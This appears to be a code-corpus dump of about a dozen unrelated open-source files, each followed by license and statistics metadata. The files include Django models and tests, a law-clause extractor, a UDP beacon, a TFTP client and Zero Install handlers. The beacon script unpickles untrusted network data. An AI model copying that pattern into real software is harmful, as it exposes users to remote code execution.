'password'
)
self.client.login(
username='admin',
password='password'
)
self.url = '/admin/clientsites/clientsite/'
def test_clientsite_admin_page_should_be_accessible(self):
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
def test_clientsite_admin_page_should_name_and_domain_columns(self):
ClientSite.objects.create(
domain='www.prontomarketing.com'
)
response = self.client.get(self.url)
expected = '<div class="text"><a href="?o=1">Domain</a></div>'
self.assertContains(response, expected, status_code=200)
| mit | -631,185,773,679,272,400 | 37.305732 | 78 | 0.618557 | false | 3.490424 | true | false | false |
MMohan1/dwitter | dwitter_app/models.py | 1 | 1342 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.models import User
import hashlib
class Dweet(models.Model):
content = models.CharField(max_length=140)
user = models.ForeignKey(User)
creation_date = models.DateTimeField(auto_now=True, blank=True)
class UserProfile(models.Model):
user = models.ForeignKey(User)
# follows = models.ManyToManyField('self', related_name='followed_by', symmetrical=False)
def gravatar_url(self):
return "http://www.gravatar.com/avatar/%s?s=50" % hashlib.md5(self.user.email).hexdigest()
User.profile = property(lambda u: UserProfile.objects.get_or_create(user=u)[0])
class Follow(models.Model):
follower = models.ForeignKey(User, related_name='follower')
following = models.ForeignKey(User, related_name='following')
follow_date = models.DateTimeField(auto_now=True)
class Likes(models.Model):
dwitte = models.ForeignKey(Dweet)
likes = models.ForeignKey(User)
creation_date = models.DateTimeField(auto_now=True)
class Meta:
unique_together = ("dwitte", "likes")
class Comments(models.Model):
dwitte = models.ForeignKey(Dweet)
comment_by = models.ForeignKey(User)
comment = models.TextField()
creation_date = models.DateTimeField(auto_now=True)
| mit | 5,100,131,809,558,829,000 | 28.822222 | 98 | 0.716095 | false | 3.569149 | false | false | false |
opensemanticsearch/open-semantic-etl | src/opensemanticetl/enhance_extract_law.py | 1 | 5028 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import re
import etl_plugin_core
#
# get taxonomy for aggregated facets / filters
#
# example: '§ 153 Abs. 1 Satz 2' -> ['§ 153', '§ 153 Absatz 1', '§ 153 Absatz 1 Satz 2']
# todo:
def get_taxonomy(law_clause, law_code = None):
law_clauses = [law_clause]
return law_clauses
#1.a
#1(2)
#1 (2)
#
# extract law codes
#
class enhance_extract_law(etl_plugin_core.Plugin):
def process(self, parameters=None, data=None):
if parameters is None:
parameters = {}
if data is None:
data = {}
clause_prefixes = [
'§',
'Article',
'Artikel',
'Art',
'Section',
'Sec',
]
clause_subsections = [
'Abschnitt',
'Absatz',
'Abs',
'Sentence',
'Satz',
'S',
'Halbsatz',
'Number',
'Nummer',
'Nr',
'Buchstabe',
]
text = etl_plugin_core.get_text(data)
clauses = []
rule = '(' + '|'.join(clause_prefixes) + ')\W*((\d+\W\w(\W|\b))|(\d+\w?))(\W?(' + '|'.join(clause_subsections) + ')\W*(\d+\w?|\w(\W|\b)))*'
for match in re.finditer(rule, text, re.IGNORECASE):
clause = match.group(0)
clause = clause.strip()
clauses.append(clause)
# if "§123" normalize to "§ 123"
if clause[0] == '§' and not clause[1] == ' ':
clause = '§ ' + clause[1:]
etl_plugin_core.append(data, 'law_clause_ss', clause)
code_matchtexts = etl_plugin_core.get_all_matchtexts(data.get('law_code_ss_matchtext_ss', []))
code_matchtexts_with_clause = []
preflabels = {}
if 'law_code_ss_preflabel_and_uri_ss' in data:
preflabels = etl_plugin_core.get_preflabels(data['law_code_ss_preflabel_and_uri_ss'])
if len(clauses)>0 and len(code_matchtexts)>0:
text = text.replace("\n", " ")
for code_match_id in code_matchtexts:
#get only matchtext (without ID/URI of matching entity)
for code_matchtext in code_matchtexts[code_match_id]:
for clause in clauses:
if clause + " " + code_matchtext in text or code_matchtext + " " + clause in text:
code_matchtexts_with_clause.append(code_matchtext)
# if "§123" normalize to "§ 123"
if clause[0] == '§' and not clause[1] == ' ':
clause = '§ ' + clause[1:]
law_code_preflabel = code_match_id
if code_match_id in preflabels:
law_code_clause_normalized = clause + " " + preflabels[code_match_id]
else:
law_code_clause_normalized = clause + " " + code_match_id
etl_plugin_core.append(data, 'law_code_clause_ss', law_code_clause_normalized)
if len(code_matchtexts)>0:
blacklist = []
listfile = open('/etc/opensemanticsearch/blacklist/enhance_extract_law/blacklist-lawcode-if-no-clause')
for line in listfile:
line = line.strip()
if line and not line.startswith("#"):
blacklist.append(line)
listfile.close()
if not isinstance(data['law_code_ss_matchtext_ss'], list):
data['law_code_ss_matchtext_ss'] = [data['law_code_ss_matchtext_ss']]
blacklisted_code_ids = []
for code_match_id in code_matchtexts:
for code_matchtext in code_matchtexts[code_match_id]:
if code_matchtext in blacklist:
if code_matchtext not in code_matchtexts_with_clause:
blacklisted_code_ids.append(code_match_id)
data['law_code_ss_matchtext_ss'].remove(code_match_id + "\t" + code_matchtext)
code_matchtexts = etl_plugin_core.get_all_matchtexts(data.get('law_code_ss_matchtext_ss', []))
if not isinstance(data['law_code_ss'], list):
data['law_code_ss'] = [data['law_code_ss']]
if not isinstance(data['law_code_ss_preflabel_and_uri_ss'], list):
data['law_code_ss_preflabel_and_uri_ss'] = [data['law_code_ss_preflabel_and_uri_ss']]
for blacklisted_code_id in blacklisted_code_ids:
if blacklisted_code_id not in code_matchtexts:
data['law_code_ss'].remove(preflabels[blacklisted_code_id])
data['law_code_ss_preflabel_and_uri_ss'].remove(preflabels[blacklisted_code_id] + ' <' + blacklisted_code_id + '>')
return parameters, data
| gpl-3.0 | -8,537,179,740,462,621,000 | 32.657718 | 147 | 0.498504 | false | 3.701107 | false | false | false |
LeonidasAntoniou/dk-plus | test files/beacon.py | 1 | 1799 | """
A simple program that sends/listens broadcast packets through UDP socket
Used to test the system if it is able to send/receive packets
"""
import time, math, sys, socket, threading, select, uuid
from collections import namedtuple
import cPickle as pickle
from params import Params
MAX_STAY = 5 #seconds until entry is removed from structure
Geo = namedtuple("Geo", "lat lon")
simple_msg = namedtuple("simple_msg", "ID text")
self_params = Params(dummy=True)
# Set the socket parameters
address = ('192.168.1.255', 54545) # host, port
sock_broad = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock_broad.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
# Create socket and bind to address
sock_listen = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_listen.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock_listen.bind(address)
def broad():
while True:
#msg = simple_msg(self_id,"I am here")
msg = self_params
assert sock_broad.sendto(pickle.dumps(msg), address), "Message failed to send"
time.sleep(1)
def listen():
print "Waiting for message"
while True:
try:
ready = select.select([sock_listen], [], [], 1.0)
if ready[0]:
d = sock_listen.recvfrom(4096)
raw_msg = d[0]
try:
msg = pickle.loads(raw_msg)
if msg.ID == self_params.ID:
pass
else:
print "From addr: '%s', msg: '%s'" % (d[1], msg)
except Exception, e:
print "Error in receiving: ", e
except socket.timeout:
print "Reached timeout. Closing..."
t_listen.cancel()
sock_listen.close()
t_listen = threading.Thread(target=listen)
t_broad = threading.Thread(target=broad)
t_listen.daemon = True
t_broad.daemon = True
t_listen.start()
t_broad.start()
time.sleep(100) #test for 100s
print "Closing beacon"
| gpl-3.0 | -9,053,915,557,494,988,000 | 25.850746 | 81 | 0.699277 | false | 3.101724 | false | false | false |
afb/0install | zeroinstall/injector/handler.py | 1 | 9160 | """
Integrates download callbacks with an external mainloop.
While things are being downloaded, Zero Install returns control to your program.
Your mainloop is responsible for monitoring the state of the downloads and notifying
Zero Install when they are complete.
To do this, you supply a L{Handler} to the L{policy}.
"""
# Copyright (C) 2009, Thomas Leonard
# See the README file for details, or visit http://0install.net.
from __future__ import print_function
from zeroinstall import _, logger
import sys
if sys.version_info[0] < 3:
import __builtin__ as builtins
else:
import builtins
from zeroinstall import SafeException
from zeroinstall import support
from zeroinstall.support import tasks
from zeroinstall.injector import download
class NoTrustedKeys(SafeException):
"""Thrown by L{Handler.confirm_import_feed} on failure."""
pass
class Handler(object):
"""
A Handler is used to interact with the user (e.g. to confirm keys, display download progress, etc).
@ivar monitored_downloads: set of downloads in progress
@type monitored_downloads: {L{download.Download}}
@ivar n_completed_downloads: number of downloads which have finished for GUIs, etc (can be reset as desired).
@type n_completed_downloads: int
@ivar total_bytes_downloaded: informational counter for GUIs, etc (can be reset as desired). Updated when download finishes.
@type total_bytes_downloaded: int
@ivar dry_run: don't write or execute any files, just print notes about what we would have done to stdout
@type dry_run: bool
"""
__slots__ = ['monitored_downloads', 'dry_run', 'total_bytes_downloaded', 'n_completed_downloads']
def __init__(self, mainloop = None, dry_run = False):
"""@type dry_run: bool"""
self.monitored_downloads = set()
self.dry_run = dry_run
self.n_completed_downloads = 0
self.total_bytes_downloaded = 0
def monitor_download(self, dl):
"""Called when a new L{download} is started.
This is mainly used by the GUI to display the progress bar.
@type dl: L{zeroinstall.injector.download.Download}"""
self.monitored_downloads.add(dl)
self.downloads_changed()
@tasks.async
def download_done_stats():
yield dl.downloaded
# NB: we don't check for exceptions here; someone else should be doing that
try:
self.n_completed_downloads += 1
self.total_bytes_downloaded += dl.get_bytes_downloaded_so_far()
self.monitored_downloads.remove(dl)
self.downloads_changed()
except Exception as ex:
self.report_error(ex)
download_done_stats()
def impl_added_to_store(self, impl):
"""Called by the L{fetch.Fetcher} when adding an implementation.
The GUI uses this to update its display.
@param impl: the implementation which has been added
@type impl: L{model.Implementation}"""
pass
def downloads_changed(self):
"""This is just for the GUI to override to update its display."""
pass
@tasks.async
def confirm_import_feed(self, pending, valid_sigs, retval):
"""Sub-classes should override this method to interact with the user about new feeds.
If multiple feeds need confirmation, L{trust.TrustMgr.confirm_keys} will only invoke one instance of this
method at a time.
@param pending: the new feed to be imported
@type pending: L{PendingFeed}
@param valid_sigs: maps signatures to a list of fetchers collecting information about the key
@type valid_sigs: {L{gpg.ValidSig} : L{fetch.KeyInfoFetcher}}
@since: 0.42"""
from zeroinstall.injector import trust
assert valid_sigs
domain = trust.domain_from_url(pending.url)
# Ask on stderr, because we may be writing XML to stdout
print(_("Feed: %s") % pending.url, file=sys.stderr)
print(_("The feed is correctly signed with the following keys:"), file=sys.stderr)
for x in valid_sigs:
print("-", x, file=sys.stderr)
def text(parent):
text = ""
for node in parent.childNodes:
if node.nodeType == node.TEXT_NODE:
text = text + node.data
return text
shown = set()
key_info_fetchers = valid_sigs.values()
while key_info_fetchers:
old_kfs = key_info_fetchers
key_info_fetchers = []
for kf in old_kfs:
infos = set(kf.info) - shown
if infos:
if len(valid_sigs) > 1:
print("%s: " % kf.fingerprint)
for key_info in infos:
print("-", text(key_info), file=sys.stderr)
shown.add(key_info)
if kf.blocker:
key_info_fetchers.append(kf)
if key_info_fetchers:
for kf in key_info_fetchers: print(kf.status, file=sys.stderr)
stdin = tasks.InputBlocker(0, 'console')
blockers = [kf.blocker for kf in key_info_fetchers] + [stdin]
yield blockers
for b in blockers:
try:
tasks.check(b)
except Exception as ex:
logger.warning(_("Failed to get key info: %s"), ex)
if stdin.happened:
print(_("Skipping remaining key lookups due to input from user"), file=sys.stderr)
break
if not shown:
print(_("Warning: Nothing known about this key!"), file=sys.stderr)
if len(valid_sigs) == 1:
print(_("Do you want to trust this key to sign feeds from '%s'?") % domain, file=sys.stderr)
else:
print(_("Do you want to trust all of these keys to sign feeds from '%s'?") % domain, file=sys.stderr)
while True:
print(_("Trust [Y/N] "), end=' ', file=sys.stderr)
sys.stderr.flush()
i = support.raw_input()
if not i: continue
if i in 'Nn':
raise NoTrustedKeys(_('Not signed with a trusted key'))
if i in 'Yy':
break
trust.trust_db._dry_run = self.dry_run
retval.extend([key.fingerprint for key in valid_sigs])
@tasks.async
def confirm_install(self, msg):
"""We need to check something with the user before continuing with the install.
@raise download.DownloadAborted: if the user cancels"""
yield
print(msg, file=sys.stderr)
while True:
sys.stderr.write(_("Install [Y/N] "))
sys.stderr.flush()
i = support.raw_input()
if not i: continue
if i in 'Nn':
raise download.DownloadAborted()
if i in 'Yy':
break
def report_error(self, exception, tb = None):
"""Report an exception to the user.
@param exception: the exception to report
@type exception: L{SafeException}
@param tb: optional traceback
@since: 0.25"""
import logging
logger.warning("%s", str(exception) or type(exception),
exc_info = (exception, exception, tb) if logger.isEnabledFor(logging.INFO) else None)
class ConsoleHandler(Handler):
"""A Handler that displays progress on stderr (a tty).
(we use stderr because we use stdout to talk to the OCaml process)
@since: 0.44"""
last_msg_len = None
update = None
disable_progress = 0
screen_width = None
# While we are displaying progress, we override builtins.print to clear the display first.
original_print = None
def downloads_changed(self):
if self.monitored_downloads and self.update is None:
if self.screen_width is None:
try:
import curses
curses.setupterm()
self.screen_width = curses.tigetnum('cols') or 80
except Exception as ex:
logger.info("Failed to initialise curses library: %s", ex)
self.screen_width = 80
self.show_progress()
self.original_print = print
builtins.print = self.print
self.update = tasks.get_loop().call_repeatedly(0.2, self.show_progress)
elif len(self.monitored_downloads) == 0:
if self.update:
self.update.cancel()
self.update = None
builtins.print = self.original_print
self.original_print = None
self.clear_display()
def show_progress(self):
if not self.monitored_downloads: return
urls = [(dl.url, dl) for dl in self.monitored_downloads]
if self.disable_progress: return
screen_width = self.screen_width - 2
item_width = max(16, screen_width // len(self.monitored_downloads))
url_width = item_width - 7
msg = ""
for url, dl in sorted(urls):
so_far = dl.get_bytes_downloaded_so_far()
if url.endswith('/latest.xml'):
url = url[:-10] # remove latest.xml from mirror URLs
leaf = url.rsplit('/', 1)[-1]
if len(leaf) >= url_width:
display = leaf[:url_width]
else:
display = url[-url_width:]
if dl.expected_size:
msg += "[%s %d%%] " % (display, int(so_far * 100 / dl.expected_size))
else:
msg += "[%s] " % (display)
msg = msg[:screen_width]
if self.last_msg_len is None:
sys.stderr.write(msg)
else:
sys.stderr.write(chr(13) + msg)
if len(msg) < self.last_msg_len:
sys.stderr.write(" " * (self.last_msg_len - len(msg)))
self.last_msg_len = len(msg)
sys.stderr.flush()
return
def clear_display(self):
if self.last_msg_len != None:
sys.stderr.write(chr(13) + " " * self.last_msg_len + chr(13))
sys.stderr.flush()
self.last_msg_len = None
def report_error(self, exception, tb = None):
self.clear_display()
Handler.report_error(self, exception, tb)
def confirm_import_feed(self, pending, valid_sigs, retval):
self.clear_display()
self.disable_progress += 1
blocker = Handler.confirm_import_feed(self, pending, valid_sigs, retval)
@tasks.async
def enable():
yield blocker
self.disable_progress -= 1
self.show_progress()
enable()
return blocker
def print(self, *args, **kwargs):
self.clear_display()
self.original_print(*args, **kwargs)
| lgpl-2.1 | 4,241,712,712,980,864,500 | 31.253521 | 125 | 0.69083 | false | 3.199441 | false | false | false |
OpenDroneMap/WebODM | app/api/common.py | 1 | 1763 | from django.core.exceptions import ObjectDoesNotExist, SuspiciousFileOperation
from rest_framework import exceptions
import os
from app import models
def get_and_check_project(request, project_pk, perms=('view_project',)):
"""
Django comes with a standard `model level` permission system. You can
check whether users are logged-in and have privileges to act on things
model wise (can a user add a project? can a user view projects?).
Django-guardian adds a `row level` permission system. Now not only can you
decide whether a user can add a project or view projects, you can specify exactly
which projects a user has or has not access to.
This brings up the reason the following function: tasks are part of a project,
and it would add a tremendous headache (and redundancy) to specify row level permissions
for each task. Instead, we check the row level permissions of the project
to which a task belongs to.
Perhaps this could be added as a django-rest filter?
Retrieves a project and raises an exception if the current user
has no access to it.
"""
try:
project = models.Project.objects.get(pk=project_pk, deleting=False)
for perm in perms:
if not request.user.has_perm(perm, project): raise ObjectDoesNotExist()
except ObjectDoesNotExist:
raise exceptions.NotFound()
return project
def path_traversal_check(unsafe_path, known_safe_path):
known_safe_path = os.path.abspath(known_safe_path)
unsafe_path = os.path.abspath(unsafe_path)
if (os.path.commonprefix([known_safe_path, unsafe_path]) != known_safe_path):
raise SuspiciousFileOperation("{} is not safe".format(unsafe_path))
# Passes the check
return unsafe_path | mpl-2.0 | 4,351,260,022,897,503,700 | 40.023256 | 92 | 0.724334 | false | 4.197619 | false | false | false |
zlcnup/csmath | hw4_lm/lm.py | 1 | 2784 | # -*- coding: utf-8 -*-
#!/usr/bin/enzl_v python
from pylab import *
from numpy import *
from math import *
def data_generator(N):
#生成向量函数F:ai*exp(bi*x)的系数数组
zl_mean = [3.4,4.5]
zl_cozl_v = [[1,0],[0,10]]
zl_coff = np.random.multivariate_normal(zl_mean,zl_cozl_v,N)
#生成观测值向量y
x = np.random.uniform(1, N, N)
y = [zl_coff[i][0]*exp(-zl_coff[i][1]*x[i]) for i in range(N)]
#生成初始值x0
x0 = [x[i]+np.random.normal(0.0,0.3) for i in range(N)]
return zl_coff, y, x0
def jacobian(zl_coff, x0, N):
J=zeros((N,N),float)
#计算第i个函数对X的第j个维度变量的偏导数
for i in range(N):
for j in range(N):
#-abexp(-b*xi)
J[i][j] = -(zl_coff[i][0]*zl_coff[i][1])*exp(-(zl_coff[i][1]*x0[j]))
return J
def normG(g):
absg = abs(g)
Normg = absg.argmax()
num = absg[Normg]
return num
def zl_LM(zl_coff, y, x0, N, maxIter):
zl_numIter = 0
zl_v = 2
zl_miu = 0.05 #阻尼系数
x = x0
zl_Threshold = 1e-5
zl_preszl_fx = 100000
while zl_numIter < maxIter:
zl_numIter += 1
#计算Jacobian矩阵
J = jacobian(zl_coff, x, N)
#计算Hessian矩阵,Ep以及g值
A = dot(J.T,J)
zl_fx = zeros((N,N),float)
zl_fx = [zl_coff[i][0]*exp(-zl_coff[i][1]*x[i]) for i in range(N)]
szl_fx = sum(array(zl_fx)*array(zl_fx))
Ep = array(y) - array(zl_fx)
g = array(dot(J.T,Ep))
H = A + zl_miu*np.eye(N)
DTp = solve(H, g)
x = x + DTp
zl_fx2 = zeros(N,float)
for j in range(N):
zl_fx2[j] = zl_coff[j][0]*exp(-zl_coff[j][1])
szl_fx2 = sum(array(zl_fx2)*array(zl_fx2))
if abs(szl_fx - zl_preszl_fx) < zl_Threshold:
print("The zl_vector x is: ")
print(x)
print("The sum is: ")
print(szl_fx2)
break
if szl_fx2 < (szl_fx+0.5*sum(array(g)*array(Ep))):
zl_miu /= zl_v
else :
zl_miu *= 2
if zl_numIter == maxIter:
print("The zl_vector x0 is: ")
print(x0)
print("The zl_vector x is: ")
print(x)
print("The sum is: ")
print(szl_fx2)
if __name__ == "__main__":
#输入向量空间的长度N(在这里假设m=n)
print("Please Input the dimension N of zl_vector space and the maxIter (the product of N and maxIter not be too large)")
N = input("Input N (not be too large): ")
N = int(N)
maxIter = input("Input the max number of interation (larger than half of the N): ")
maxIter = int(maxIter)
zl_coff, y, x0 = data_generator(N)
#zl_LM算法
zl_LM(zl_coff, y, x0, N, maxIter)
| mit | -685,786,909,710,917,200 | 28.573034 | 124 | 0.518237 | false | 2.270923 | false | false | false |
atizo/pygobject | ltihooks.py | 1 | 2327 | # -*- Mode: Python; py-indent-offset: 4 -*-
# ltihooks.py: python import hooks that understand libtool libraries.
# Copyright (C) 2000 James Henstridge.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import os, ihooks
class LibtoolHooks(ihooks.Hooks):
def get_suffixes(self):
"""Like normal get_suffixes, but adds .la suffixes to list"""
ret = ihooks.Hooks.get_suffixes(self)
ret.insert(0, ('module.la', 'rb', 3))
ret.insert(0, ('.la', 'rb', 3))
return ret
def load_dynamic(self, name, filename, file=None):
"""Like normal load_dynamic, but treat .la files specially"""
if len(filename) > 3 and filename[-3:] == '.la':
fp = open(filename, 'r')
dlname = ''
installed = 1
line = fp.readline()
while line:
if len(line) > 7 and line[:7] == 'dlname=':
dlname = line[8:-2]
elif len(line) > 10 and line[:10] == 'installed=':
installed = line[10:-1] == 'yes'
line = fp.readline()
fp.close()
if dlname:
if installed:
filename = os.path.join(os.path.dirname(filename),
dlname)
else:
filename = os.path.join(os.path.dirname(filename),
'.libs', dlname)
return ihooks.Hooks.load_dynamic(self, name, filename, file)
importer = ihooks.ModuleImporter()
importer.set_hooks(LibtoolHooks())
def install():
importer.install()
def uninstall():
importer.uninstall()
install()
| lgpl-2.1 | -552,883,266,822,510,400 | 37.783333 | 75 | 0.593468 | false | 4.032929 | false | false | false |
eBay/cronus-agent | agent/agent/lib/agent_thread/deactivate_manifest.py | 1 | 5040 | #pylint: disable=W0703,R0912,R0915,R0904,W0105
'''
Copyright 2014 eBay Software Foundation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
""" Thread to perform creation of a service """
import os
import shutil
import traceback
from agent.lib.utils import islink
from agent.lib.utils import readlink
from agent.lib.errors import Errors
from agent.lib.errors import AgentException
from agent.controllers.service import ServiceController
import logging
from agent.lib.agent_thread.manifest_control import ManifestControl
from agent.lib import manifestutil
class DeactivateManifest(ManifestControl):
""" This thread will attempt to activate a manifest
This means going throuh each package
call the stop
call the deactivate
delete the active link
call the activate
create the active link
call start
"""
THREAD_NAME = 'deactivate_manifest'
def __init__(self, threadMgr, service):
""" Constructor """
ManifestControl.__init__(self, threadMgr, service, manifest = None, name = 'deactivate_manifest')
self.setName(DeactivateManifest.THREAD_NAME)
self.__LOG = manifestutil.getServiceLogger(self, logging.getLogger(__name__))
def doRun(self):
""" Main body of the thread """
errorMsg = ""
errorCode = None
failed = False
try:
activePath = os.path.join(ServiceController.manifestPath(self._service), 'active')
oldManifest = None
# make sure that if the active path exists, it's a link
# if not log that and delete the link
if (os.path.exists(activePath) and not os.name == 'nt' and not islink(activePath)):
self.__LOG.error('%s is not a link. Attempted to delete' % activePath)
shutil.rmtree(activePath)
if (os.path.exists(activePath)):
oldManifest = os.path.basename(readlink(activePath))
else:
raise AgentException(error = Errors.ACTIVEMANIFEST_MANIFEST_MISSING, errorMsg = 'No active manifest - cannot deactivate service')
self.__deactivateManifest(self._service, oldManifest)
self.__removeSymlink(self._service)
except SystemExit as exc:
failed = True
if (len(exc.args) == 2):
# ok we got {err code, err msg}
errorCode = exc.args[0]
errorMsg = exc.args[1]
raise exc
except AgentException as exc:
failed = True
errorMsg = 'Deactivate Manifest - Agent Exception - %s' % exc.getMsg()
errorCode = exc.getCode()
except Exception as exc:
failed = True
errorMsg = 'Deactivate Manifest - Unknown error - (%s) - %s - %s' \
% (self._service, str(exc), traceback.format_exc(5))
errorCode = Errors.UNKNOWN_ERROR
finally:
if failed:
self.__LOG.warning(errorMsg)
self._updateStatus(httpStatus = 500, error = errorCode,
errorMsg = errorMsg)
self.__LOG.debug('Done: activate manifest for (%s)' % (self._service))
self._updateProgress(100)
def __deactivateManifest(self, service, manifest):
""" deactive a manifest. This means calling stop then deactive on the manifest
@param service - service of manifest to deactivate
@param manifest - manifest to deactivate
@param stack - stack for recovery
"""
self.__LOG.debug("Deactivate Manifest %s-%s" % (service, manifest))
if (manifest == None):
return
self._execPackages('shutdown', service, manifest, 11, 25, activateFlow = False)
self._execPackages('deactivate', service, manifest, 26, 50, activateFlow = False)
manifestutil.processControllerInPackage(service, manifest, activateFlow = False)
def __removeSymlink(self, service):
""" remove symlink """
#remove symlink
activePath = self.__getSymlinkPath(service)
if os.path.exists(activePath):
if (os.path.islink(activePath)): # *nix
os.remove(activePath)
else:
raise AgentException('Running platform seems to be neither win32 nor *nix with any (sym)link support. Can\'t proceed with link deletion')
def __getSymlinkPath(self, service):
""" return symlink path for a service """
return os.path.join(ServiceController.manifestPath(service), 'active')
| apache-2.0 | 1,921,334,820,953,624,800 | 38.069767 | 153 | 0.639286 | false | 4.405594 | false | false | false |
cizixs/tftp | tftp/tftp_client.py | 1 | 7600 | import sys
import struct
import binascii
import argparse
import tftp
from tftp import SocketBase
from tftp import get_opcode
from tftp import default_port
from tftp import make_data_packet
from tftp import make_ack_packet
class State(object):
START, DATA = range(2)
# Make packet functions.
def make_request_packet(opcode, filename, mode='octet'):
values = (opcode, filename, 0, mode, 0)
s = struct.Struct('! H {}s B {}s B'.format(len(filename),len(mode)) )
return s.pack(*values)
def make_rrq_packet(filename):
return make_request_packet(tftp.RRQ, filename)
def make_wrq_packet(filename):
return make_request_packet(tftp.WRQ, filename)
class TftpClient(SocketBase):
def __init__(self, host='127.0.0.1', port='', filename=None, **argv):
self.host = host
self.orig_port = self.port = port or default_port()
self.block_num = 1
self.is_done = False
self.status = State.START
self.action = argv.get('action', 'get')
self.debug = argv.get('debug', False)
self.block_size = argv.get('block_size', tftp.DEFAULT_BLOCK_SIZE)
self.filename = filename
self.setup_file()
self.setup_connect()
def reset(self):
self.block_num = 1
self.is_done = False
self.status = State.START
self.port = self.orig_port or 69
self.setup_file()
self.setup_connect()
@property
def server_addr(self):
return (self.host, self.port)
def setup_file(self):
if self.filename:
if self.action == 'get':
self.fd = open(self.filename, 'wb')
elif self.action == 'put':
self.fd = open(self.filename, 'rb')
else:
raise Exception('unsupport action %s' % self.action)
def handle_packet(self, packet, addr):
"""Handle pakcet from remote.
If it's a wrong packet, not from expected host/port, discard it;
If it's a data packet, send ACK packet back;
If it's a error packet, print error and exit;
If it's a ack packet, send Data packet back.
"""
host, port = addr
if host != self.host:
# ignore packet from wrong address.
return
packet_len = len(packet)
opcode = get_opcode(packet)
if opcode == tftp.ERROR:
err_code = struct.unpack('!H', packet[2:4])[0]
err_msg = packet[4:packet_len-1]
print "Error %s: %s" % (err_code, err_msg)
sys.exit(err_code)
elif opcode == tftp.DATA:
# This is a data packet received from server, save data to file.
# update port
if self.port != port:
self.port = port
block_num = struct.unpack('!H', packet[2:4])[0]
if block_num != self.block_num:
# skip unexpected #block data packet
print 'unexpected block num %d' % block_num
return
data = packet[4:]
self.fd.write(data)
if len(packet) < self.block_size + 2:
self.is_done = True
self.fd.close()
file_len = self.block_size * (self.block_num -1) + len(data)
print '%d bytes received.' % file_len
self.block_num += 1
elif opcode == tftp.ACK:
# This is a write request ACK
# Send next block_size data to server
if self.port != port:
self.port = port
block_num = struct.unpack('!H', packet[2:4])[0]
self.verbose('received ack for %d' % block_num)
self.block_num += 1
else:
raise Exception('unrecognized packet: %s', str(opcode))
def get_next_packet(self):
if self.status == State.START:
opcode = tftp.RRQ if self.action == 'get' else tftp.WRQ
self.verbose('about to send packet %d' % opcode)
packet = make_request_packet(opcode, self.filename)
self.status = State.DATA
elif self.status == State.DATA:
if self.action == 'get':
self.verbose('about to send ack for %d' % (self.block_num - 1))
packet = make_ack_packet(self.block_num-1)
elif self.action == 'put':
self.verbose('about to send data for %d' % (self.block_num - 1))
data = self.fd.read(self.block_size)
if len(data) < self.block_size:
self.is_done = True
packet = make_data_packet(self.block_num-1, data)
return packet
def handle(self):
"""Main loop function for tftp.
The main loop works like the following:
1. get next-to-send packet
2. send the packet to server
3. receive packet from server
4. handle packet received, back to step 1.
"""
while not self.is_done:
packet = self.get_next_packet()
if packet:
self.send_packet(packet)
(packet, addr) = self.recv_packet()
self.handle_packet(packet, addr)
def main():
menu = """Tftp client help menu:
Supported commands:
connect connect to a server
get get file
put put file
quit exit
? print this menu
"""
def command_parse(line):
if not line:
return (None, None)
line = line.split()
command = line[0]
options = line[1:]
return command, options
tftp_client = TftpClient()
def connect(*args):
tftp_client.host = args[0]
if len(args) > 1:
tftp_client.port = int(args[1])
def get(*args):
print args[0]
tftp_client.action = 'get'
tftp_client.filename = args[0]
tftp_client.reset()
tftp_client.handle()
def put(*args):
tftp_client.filename = args[0]
tftp_client.action = 'put'
tftp_client.reset()
tftp_client.handle()
def quit(*args):
print 'Bye!'
def print_help(*args):
print menu
command_map = {
'connect': connect,
'get': get,
'put': put,
'quit': quit,
}
print 'Welcome to python tftpclient.'
while True:
line = raw_input('tftp> ').strip().lower()
command, options = command_parse(line)
command_map.get(command, print_help)(*options)
if command == 'quit':
break
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Tftp client in pure python.')
parser.add_argument('--host', '-s', action='store', dest='host',
default='127.0.0.1', help='Server hostname')
parser.add_argument('--port', '-p', action='store', dest='port', type=int,
default=69, help='Server port')
parser.add_argument('--file', '-f', action='store', dest='filename',
help='File to get from server')
parser.add_argument('--debug', '-d', action='store_true',
default=False, help='Debug mode: print more information(debug: False)')
parser.add_argument('action', metavar='action', nargs='*',
help='Action to conduct: put or get(default: get)')
args = parser.parse_args()
print args
if not args.filename or not args.action:
main()
else:
tftp_client = TftpClient(args.host, args.port, args.filename,
action=args.action[0], debug=args.debug)
tftp_client.handle()
| mit | -6,937,391,200,844,491,000 | 31.340426 | 83 | 0.550526 | false | 3.830645 | false | false | false |
mduggan/toumeika | shikin/review.py | 1 | 4611 | # -*- coding: utf-8 -*-
"""
Shikin review page and associated API
"""
from sqlalchemy import func
import datetime
import random
from flask import render_template, abort, request, jsonify, session
from . import app, ocrfix
from .model import DocSegment, DocSegmentReview, User
from .util import dologin
def get_user_or_abort():
# if request.remote_addr == '127.0.0.1':
# user = 'admin'
# else:
user = session.get('username')
if not user:
abort(403)
u = User.query.filter(User.name == user).first()
if not u:
abort(403)
return u
@app.route('/api/reviewcount/<user>')
def review_count(user):
u = User.query.filter(User.name == user).first()
if not u:
return abort(404)
return jsonify({'user': user, 'count': len(u.reviews)})
@app.route('/api/unreview/<int:segmentid>')
def unreview(segmentid):
user = get_user_or_abort()
revid = request.args.get('revid')
